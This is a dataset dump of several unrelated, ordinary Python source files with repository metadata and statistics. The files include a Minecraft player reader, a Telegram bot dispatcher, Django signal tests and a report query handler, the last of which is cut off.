| 24.4375 | 80 | 0.539642 | 103 | 782 | 3.961165 | 0.572816 | 0.078431 | 0.058824 | 0.078431 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018553 | 0.310742 | 782 | 31 | 81 | 25.225806 | 0.738404 | 0.026854 | 0 | 0 | 0 | 0 | 0.113158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.16 | 0 | 0.2 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d5d4f0834f8da2bcbaa8cad00c966d5e044936 | 425 | py | Python | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | stylo/testing/examples.py | mvinoba/stylo | 84f3a74cf9cb29c6d24b990dc9a474562114392b | [
"MIT"
] | null | null | null | import pytest
def define_benchmarked_example(name, example):
import matplotlib
matplotlib.use("Agg")
image = example()
@pytest.mark.parametrize("n", [512, 1024, 2048])
def benchmark_test(benchmark, n):
filename = None
if n == 512:
filename = "docs/_static/examples/" + name.lower() + ".png"
benchmark(image, n, n, filename=filename)
return benchmark_test
| 18.478261 | 71 | 0.623529 | 48 | 425 | 5.416667 | 0.583333 | 0.030769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044164 | 0.254118 | 425 | 22 | 72 | 19.318182 | 0.776025 | 0 | 0 | 0 | 0 | 0 | 0.070588 | 0.051765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2d8e578b36c81838d94eacbe7d5ce89b3fd1df5 | 2,700 | py | Python | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | pycraft/player.py | PapaMarky/pycraft | 919fe000ae7f1d2dd715d0468957d67ca61725b4 | [
"MIT"
] | null | null | null | import glob
import os
import python_nbt.nbt as nbt
import requests
from pycraft.error import PycraftException
from pycraft.region import Region
class Player:
def __init__(self, world_path):
if not os.path.exists(world_path):
print(f'Saved world not found: "{world_path}"')
raise PycraftException('World not found')
flist = glob.glob(os.path.join(world_path, 'playerdata', '*.dat'))
if len(flist) < 1:
print('No players found')
raise PycraftException('Not enough players')
if len(flist) > 1:
print('Too many players:')
for f in flist:
print(f' - {f}')
raise PycraftException('Too many players')
uuid = ''.join(os.path.basename(flist[0])[:-4].split('-'))
self._uuid = uuid
self._path = flist[0]
self._nbt_data = nbt.read_from_nbt_file(self._path)
self._world_path = world_path
self._region = None
self._username = None
@staticmethod
def get_username(uuid):
r = requests.get(f'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}')
if r.ok:
data = r.json()
name = data.get('name', 'UNKNOWN')
# There are other things (skin.png, cape.png) that you can get
# See https://wiki.vg/Mojang_API#UUID_to_Name_History
# for p in data['properties']:
# print(f'---{p["name"]}---')
# metadata[p['name']] = json.loads(base64.b64decode(p['value']))
# print(f'{metadata}')
else:
name = 'ERROR'
return name
def get_attr_list(self):
return list(self._nbt_data)
def get_attr(self, name):
if name in self._nbt_data:
return self._nbt_data[name]
def get_region(self):
if self._region:
return self._region
p = self.position
self._region = Region.from_position_xy(self._world_path, p[0], p[2])
return self._region
def get_vehicle(self):
v = self.get_attr('RootVehicle')
return v
@property
def chunk_position(self):
p = self.position
return int(p[0] / 16), int(p[1] / 16), int(p[2] / 16)
@property
def position(self):
return self.get_attr('Pos').json_obj(full_json=False)
@property
def inventory(self):
return self.get_attr('Inventory').json_obj(full_json=False)
@property
def uuid(self):
return self._uuid
@property
def username(self):
if self._username is None:
self._username = Player.get_username(self.uuid)
return self._username
| 29.67033 | 94 | 0.583333 | 346 | 2,700 | 4.381503 | 0.309249 | 0.041557 | 0.029024 | 0.014512 | 0.08971 | 0.040897 | 0.040897 | 0 | 0 | 0 | 0 | 0.01051 | 0.295185 | 2,700 | 90 | 95 | 30 | 0.786127 | 0.097778 | 0 | 0.132353 | 0 | 0 | 0.100906 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161765 | false | 0 | 0.088235 | 0.058824 | 0.426471 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2da1b80294662dc1e56bd780492fbf92dc01da3 | 387 | py | Python | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null | day13/part2.py | BaderSZ/adventofcode2020 | dae705fd093bbd176021118f0898947cb4b02f84 | [
"MIT"
] | null | null | null |
inp = []
with open("input", "r") as f:
for line in f.readlines():
inp = inp + line.rsplit()[0].split(",")
# In form (BUS_ID, index)
busses = [(int(x), i) for i, x in enumerate(inp[1:]) if x != "x"]
# Chinese remainder theorem
time = 0
prod = 1
for id, i in busses:
while (time + i)%id != 0:
time = time + prod
prod = prod * id
print("Result = ", time)
| 17.590909 | 65 | 0.542636 | 63 | 387 | 3.31746 | 0.52381 | 0.076555 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017731 | 0.271318 | 387 | 21 | 66 | 18.428571 | 0.723404 | 0.126615 | 0 | 0 | 0 | 0 | 0.051051 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2dc3c2e573af6b5ac4a24e0a8a5e7d24b83ef56 | 1,143 | py | Python | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 167 | 2017-04-21T17:54:14.000Z | 2022-02-19T20:37:44.000Z | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 15 | 2017-08-31T12:33:18.000Z | 2021-07-03T06:36:36.000Z | setup.py | torstenfeld/django-warrant | ad19b9c9aefb9e44f6a01c07d11dc41809f88881 | [
"BSD-3-Clause"
] | 56 | 2017-06-15T17:26:43.000Z | 2022-03-30T15:15:42.000Z | import os
from setuptools import setup, find_packages
def parse_requirements(filename):
""" load requirements from a pip requirements file """
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
version = '0.1.1'
README="""Django library that uses the warrant python utility library to provide authentication via AWS Cognito."""
setup(
name='django-warrant',
version=version,
description=README,
long_description=README,
classifiers=[
'Framework :: Django',
'Framework :: Django :: 1.10',
"Programming Language :: Python",
"Topic :: Software Development :: Libraries :: Python Modules",
"Environment :: Web Environment",
],
keywords='aws,cognito,api,gateway,django',
author='MetaMetrics',
author_email='engineering@lexile.com',
packages=find_packages(exclude=('cdu',)),
url='https://github.com/MetaMetricsInc/django-warrant',
license='GNU GPL V3',
install_requires=parse_requirements('requirements.txt'),
include_package_data=True,
zip_safe=True,
)
| 28.575 | 115 | 0.684164 | 131 | 1,143 | 5.89313 | 0.664122 | 0.031088 | 0.023316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007576 | 0.191601 | 1,143 | 39 | 116 | 29.307692 | 0.827922 | 0.040245 | 0 | 0 | 0 | 0 | 0.393021 | 0.04775 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2dd633808e9b6b31f7be658d3a59c23ec67ec01 | 1,599 | py | Python | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 21 | 2015-11-19T16:18:45.000Z | 2021-12-02T18:20:39.000Z | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 5,671 | 2015-01-06T14:38:52.000Z | 2022-03-31T22:11:14.000Z | src/python/WMCore/WMBS/MySQL/Subscriptions/GetSubsWithoutJobGroup.py | khurtado/WMCore | f74e252412e49189a92962945a94f93bec81cd1e | [
"Apache-2.0"
] | 67 | 2015-01-21T15:55:38.000Z | 2022-02-03T19:53:13.000Z | #!/usr/bin/env python
from __future__ import division, print_function
from WMCore.Database.DBFormatter import DBFormatter
class GetSubsWithoutJobGroup(DBFormatter):
"""
_GetSubsWithoutJobGroup_
Finds whether there are unfinished subscriptions for Production and
Processing task types where JobCreator hasn't yet created any jobs
nor a jobgroup associated to it.
"""
sql = """SELECT wmbs_subscription.id, wmbs_workflow.task FROM wmbs_subscription
INNER JOIN wmbs_sub_types ON wmbs_sub_types.id = wmbs_subscription.subtype
INNER JOIN wmbs_workflow ON wmbs_workflow.id = wmbs_subscription.workflow
WHERE wmbs_subscription.finished=0 AND
wmbs_sub_types.name IN ('Production','Processing') AND
NOT EXISTS (SELECT * FROM wmbs_jobgroup
WHERE wmbs_jobgroup.subscription = wmbs_subscription.id)
"""
def format(self, result):
"""
Have to filter task names that contain only two slashes '/',
such that we can declare those tasks as top level task.
:param result:
:return: a list of subscriptions id
"""
results = DBFormatter.format(self, result)
subIDs = []
for row in results:
if len(row[1].split('/')) <= 3: # remember, first item is empty
subIDs.append(row[0])
return subIDs
def execute(self, conn=None, transaction=False):
result = self.dbi.processData(self.sql, conn=conn, transaction=transaction)
return self.format(result)
| 35.533333 | 89 | 0.65666 | 189 | 1,599 | 5.428571 | 0.550265 | 0.093567 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003422 | 0.268918 | 1,599 | 44 | 90 | 36.340909 | 0.874252 | 0.258286 | 0 | 0 | 0 | 0 | 0.468468 | 0.156757 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.380952 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ddd4f9ac3b25764edd0fce1bfdd7ca076702ea | 1,092 | py | Python | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
] | 16 | 2021-02-18T15:53:24.000Z | 2021-11-25T19:50:03.000Z | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
] | 1 | 2021-05-13T05:23:52.000Z | 2021-05-13T05:23:52.000Z | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
] | 2 | 2021-02-24T16:03:30.000Z | 2021-03-13T14:17:06.000Z | import os
import glob
import collections
import json
import numpy as np
from absl import app, flags
flags.DEFINE_string('results_dir', 'results/linkpred_d_sweep/fsvd',
'Directory where run files are written.')
FLAGS = flags.FLAGS
def main(_):
files = glob.glob(os.path.join(FLAGS.results_dir, '*'))
stats = collections.defaultdict(list)
for fname in files:
#print(fname)
dataset, d, run_id = fname.split('/')[-1].replace('.txt', '').split('_')
d = int(d)
lines = open(fname).read().split('\n')
if not lines[-1]: lines=lines[:-1] # Remove last line (if blank)
data = json.loads(lines[-1])
#print(data)
stats[(dataset, d)].append((data['auc'], data['time']))
print('model,dataset,dim,test,time')
for k in list(sorted(stats.keys())):
stats[k] = np.array(stats[k])
dataset, d = k
# Total embedding dimension is twice the rank, as node is embedded in U and V.
d *= 2
print('fsvd,%s,%i,%g,%g' % (
dataset, d, np.mean(stats[k][:, 0]), np.mean(stats[k][:, 1])))
if __name__ == '__main__':
app.run(main)
| 29.513514 | 82 | 0.623626 | 166 | 1,092 | 4.006024 | 0.512048 | 0.04812 | 0.033083 | 0.03609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007964 | 0.195055 | 1,092 | 36 | 83 | 30.333333 | 0.748578 | 0.117216 | 0 | 0 | 0 | 0 | 0.151042 | 0.058333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.214286 | 0 | 0.25 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2deb7eb7ee2e7c59cb13a91610999e85e9556e5 | 3,737 | py | Python | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | # Copyright (c) 2021 Emanuele Bellocchia
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Imports
#
import pyrogram
from typing import Any
from telegram_crypto_price_bot.config import Config
from telegram_crypto_price_bot.logger import Logger
from telegram_crypto_price_bot.message_sender import MessageSender
from telegram_crypto_price_bot.translation_loader import TranslationLoader
#
# Classes
#
# Message dispatcher class
class MessageDispatcher:
# Constructor
def __init__(self,
config: Config,
logger: Logger,
translator: TranslationLoader) -> None:
self.config = config
self.logger = logger
self.translator = translator
# Dispatch command
def Dispatch(self,
client: pyrogram.Client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# New chat created
if message.group_chat_created is not None:
self.__OnCreatedChat(client, message, **kwargs)
# A member left the chat
if message.left_chat_member is not None:
self.__OnLeftMember(client, message, **kwargs)
# A member joined the chat
if message.new_chat_members is not None:
self.__OnJoinedMember(client, message, **kwargs)
# Function called when a new chat is created
def __OnCreatedChat(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# Send the welcome message
MessageSender(client, self.config, self.logger).SendMessage(
message.chat,
self.translator.GetSentence("BOT_WELCOME_MSG")
)
# Function called when a member left the chat
def __OnLeftMember(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# If the member is the bot itself, remove the chat from the scheduler
if message.left_chat_member.is_self:
kwargs["coin_info_scheduler"].ChatLeft(message.chat)
# Function called when a member joined the chat
def __OnJoinedMember(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# If the member is the bot itself, send the welcome message
for member in message.new_chat_members:
if member.is_self:
MessageSender(client, self.config, self.logger).SendMessage(
message.chat,
self.translator.GetSentence("BOT_WELCOME_MSG")
)
break
| 39.336842 | 79 | 0.652395 | 443 | 3,737 | 5.395034 | 0.345372 | 0.03682 | 0.030126 | 0.038494 | 0.312971 | 0.206695 | 0.185774 | 0.185774 | 0.166527 | 0.145607 | 0 | 0.001499 | 0.286058 | 3,737 | 94 | 80 | 39.755319 | 0.894303 | 0.395504 | 0 | 0.346939 | 0 | 0 | 0.022062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0 | 0.122449 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e20661e6fd1d16b0a0f47887066e3517db1d11 | 485 | py | Python | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
qntCaso = int(input())
for caso in range(qntCaso):
numTotalRena, numTotalRenaPuxaraoTreno = map(int, input().split())
listRena = [list(map(str, input().split())) for linha in range(numTotalRena)]
listRena = sorted(listRena, key= lambda x: (-int(x[1]),int(x[2]),float(x[3]),x[0]))
print("CENARIO {"+str(caso+1)+"}")
for indiceRena in range(numTotalRenaPuxaraoTreno): print("{} - {}".format(indiceRena + 1, listRena[indiceRena][0])) | 44.090909 | 119 | 0.637113 | 62 | 485 | 4.983871 | 0.5 | 0.067961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019465 | 0.152577 | 485 | 11 | 119 | 44.090909 | 0.73236 | 0.043299 | 0 | 0 | 0 | 0 | 0.036717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e20f39835f5c3307a75b90031b87737e56b9cf | 2,754 | py | Python | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | """
Tests for signal handlers.
"""
import logging
import pytest
from course_access_groups.models import Membership
from course_access_groups.signals import (
on_learner_account_activated,
on_learner_register,
)
from test_utils.factories import (
MembershipRuleFactory,
UserFactory,
UserOrganizationMappingFactory,
)
@pytest.mark.django_db
@pytest.mark.parametrize('receiver_function', [
on_learner_account_activated,
on_learner_register,
])
def test_working_membership_rule_signals(receiver_function):
"""
Ensure USER_ACCOUNT_ACTIVATED and REGISTER_USER signals are processed correctly.
"""
rule = MembershipRuleFactory(domain='example.com')
mapping = UserOrganizationMappingFactory.create(
user__email='someone@example.com',
user__is_active=True,
organization=rule.group.organization,
)
receiver_function(object(), mapping.user)
assert Membership.objects.filter(user=mapping.user).exists(), 'Should create the rule'
receiver_function(object(), mapping.user) # Should not fail when receiving the signal twice
@pytest.mark.django_db
def test_register_user_signal_inactive_user(caplog):
"""
Ensure REGISTER_USER signal is not processed for inactive users.
Otherwise, `Membership.create_from_rules` would raise an exception.
"""
caplog.set_level(logging.INFO) # Ensure INFO logs are captured
rule = MembershipRuleFactory(domain='example.com')
mapping = UserOrganizationMappingFactory.create(
user__email='someone@example.com',
user__is_active=False,
organization=rule.group.organization,
)
on_learner_register(object(), mapping.user)
assert not Membership.objects.filter(user=mapping.user).exists(), 'Should not create the rule for inactive user'
assert 'Received REGISTER_USER signal for inactive user' in caplog.text
@pytest.mark.django_db
@pytest.mark.parametrize('receiver_function,signal_name', [
[on_learner_account_activated, 'USER_ACCOUNT_ACTIVATED'],
[on_learner_register, 'REGISTER_USER'],
])
def test_failed_membership_rule_signals(monkeypatch, caplog, receiver_function, signal_name):
"""
Ensure errors in USER_ACCOUNT_ACTIVATED and REGISTER_USER are logged.
"""
monkeypatch.delattr(Membership, 'create_from_rules') # Act as if create_from_rules() don't work!
user = UserFactory.create(email='someone@example.com')
MembershipRuleFactory(domain='example.com')
with pytest.raises(AttributeError):
receiver_function(object(), user)
assert 'Error receiving {signal_name} signal for user'.format(signal_name=signal_name) in caplog.text
assert 'someone@example.com' in caplog.text
assert 'AttributeError' in caplog.text
| 33.585366 | 116 | 0.755628 | 326 | 2,754 | 6.144172 | 0.303681 | 0.031453 | 0.033949 | 0.037444 | 0.352971 | 0.303545 | 0.268597 | 0.22666 | 0.176735 | 0.121817 | 0 | 0 | 0.153595 | 2,754 | 81 | 117 | 34 | 0.859288 | 0.157226 | 0 | 0.358491 | 0 | 0 | 0.167551 | 0.022546 | 0 | 0 | 0 | 0 | 0.113208 | 1 | 0.056604 | false | 0 | 0.09434 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e2f5a7e716d47c2bc599311bb54fb09059029e | 12,180 | py | Python | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | null | null | null | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Query Handling for all APIs."""
import datetime
import logging
from dateutil import parser
from dateutil import relativedelta
from django.core.exceptions import FieldDoesNotExist
from django.db.models.functions import TruncDay
from django.db.models.functions import TruncMonth
from pytz import UTC
from api.query_filter import QueryFilter
from api.query_filter import QueryFilterCollection
from api.utils import DateHelper
LOG = logging.getLogger(__name__)
WILDCARD = "*"
class TruncMonthString(TruncMonth):
"""Class to handle string formated day truncation."""
def convert_value(self, value, expression, connection):
"""Convert value to a string after super."""
value = super().convert_value(value, expression, connection)
return value.strftime("%Y-%m")
class TruncDayString(TruncDay):
"""Class to handle string formated day truncation."""
def convert_value(self, value, expression, connection):
"""Convert value to a string after super."""
value = super().convert_value(value, expression, connection)
return value.strftime("%Y-%m-%d")
class QueryHandler:
"""Handles report queries and responses."""
def __init__(self, parameters):
"""Establish query handler.
Args:
parameters (QueryParameters): parameter object for query
"""
LOG.debug(f"Query Params: {parameters}")
self.dh = DateHelper()
parameters = self.filter_to_order_by(parameters)
self.tenant = parameters.tenant
self.access = parameters.access
self.parameters = parameters
self.default_ordering = self._mapper._report_type_map.get("default_ordering")
self.time_interval = []
self._max_rank = 0
self.time_scope_units = self.parameters.get_filter("time_scope_units")
if self.parameters.get_filter("time_scope_value"):
self.time_scope_value = int(self.parameters.get_filter("time_scope_value"))
# self.start_datetime = parameters["start_date"]
# self.end_datetime = parameters["end_date"]
for param, attr in [("start_date", "start_datetime"), ("end_date", "end_datetime")]:
p = self.parameters.get(param)
if p:
setattr(self, attr, datetime.datetime.combine(parser.parse(p).date(), self.dh.midnight, tzinfo=UTC))
else:
setattr(self, attr, None)
if self.resolution == "monthly":
self.date_to_string = lambda dt: dt.strftime("%Y-%m")
self.string_to_date = lambda dt: datetime.datetime.strptime(dt, "%Y-%m").date()
self.date_trunc = TruncMonthString
self.gen_time_interval = DateHelper().list_months
else:
self.date_to_string = lambda dt: dt.strftime("%Y-%m-%d")
self.string_to_date = lambda dt: datetime.datetime.strptime(dt, "%Y-%m-%d").date()
self.date_trunc = TruncDayString
self.gen_time_interval = DateHelper().list_days
if not (self.start_datetime or self.end_datetime):
self._get_timeframe()
self._create_time_interval()
# FIXME: move this to a standalone utility function.
@staticmethod
def has_wildcard(in_list):
"""Check if list has wildcard.
Args:
in_list (List[String]): List of strings to check for wildcard
Return:
(Boolean): if wildcard is present in list
"""
if isinstance(in_list, bool):
return False
if not in_list:
return False
return any(WILDCARD == item for item in in_list)
@property
def order(self):
"""Extract order_by parameter and apply ordering to the appropriate field.
Returns:
(String): Ordering value. Default is '-total'
Example:
`order_by[total]=asc` returns `total`
`order_by[total]=desc` returns `-total`
"""
order_map = {"asc": "", "desc": "-"}
return f"{order_map[self.order_direction]}{self.order_field}"
@property
def order_field(self):
"""Order-by field name.
The default is 'total'
"""
order_by = self.parameters.get("order_by", self.default_ordering)
return list(order_by.keys()).pop()
@property
def order_direction(self):
"""Order-by orientation value.
Returns:
(str) 'asc' or 'desc'; default is 'desc'
"""
order_by = self.parameters.get("order_by", self.default_ordering)
return list(order_by.values()).pop()
@property
def max_rank(self):
"""Return the max rank of a ranked list."""
return self._max_rank
@max_rank.setter
def max_rank(self, max_rank):
"""Max rank setter."""
self._max_rank = max_rank
@property
def resolution(self):
"""Extract resolution or provide default.
Returns:
(String): The value of how data will be sliced.
"""
return self.parameters.get_filter("resolution", default="daily")
def check_query_params(self, key, in_key):
"""Test if query parameters has a given key and key within it.
Args:
key (String): key to check in query parameters
in_key (String): key to check if key is found in query parameters
Returns:
(Boolean): True if they keys given appear in given query parameters.
"""
return self.parameters and key in self.parameters and in_key in self.parameters.get(key) # noqa: W504
def get_time_scope_units(self):
"""Extract time scope units or provide default.
Returns:
(String): The value of how data will be sliced.
"""
if self.time_scope_units:
return self.time_scope_units
time_scope_units = self.parameters.get_filter("time_scope_units", default="day")
self.time_scope_units = time_scope_units
return self.time_scope_units
def get_time_scope_value(self):
"""Extract time scope value or provide default.
Returns:
(Integer): time relative value providing query scope
"""
if self.time_scope_value:
return self.time_scope_value
time_scope_value = self.parameters.get_filter("time_scope_value", default=-10)
self.time_scope_value = int(time_scope_value)
return self.time_scope_value
def _get_timeframe(self):
"""Obtain timeframe start and end dates.
Returns:
(DateTime): start datetime for query filter
(DateTime): end datetime for query filter
"""
time_scope_value = self.get_time_scope_value()
time_scope_units = self.get_time_scope_units()
start = None
end = None
if time_scope_units == "month":
if time_scope_value == -1:
# get current month
start = self.dh.this_month_start
end = self.dh.today
else:
# get previous month
start = self.dh.last_month_start
end = self.dh.last_month_end
else:
if time_scope_value == -10:
# get last 10 days
start = self.dh.n_days_ago(self.dh.this_hour, 9)
end = self.dh.this_hour
else:
# get last 30 days
start = self.dh.n_days_ago(self.dh.this_hour, 29)
end = self.dh.this_hour
self.start_datetime = start
self.end_datetime = end
return (self.start_datetime, self.end_datetime, self.time_interval)
def _create_time_interval(self):
"""Create list of date times in interval.
Returns:
(List[DateTime]): List of all interval slices by resolution
"""
self.time_interval = sorted(self.gen_time_interval(self.start_datetime, self.end_datetime))
return self.time_interval
def _get_date_delta(self):
"""Return a time delta."""
if self.time_scope_value in [-1, -2]:
date_delta = relativedelta.relativedelta(months=abs(self.time_scope_value))
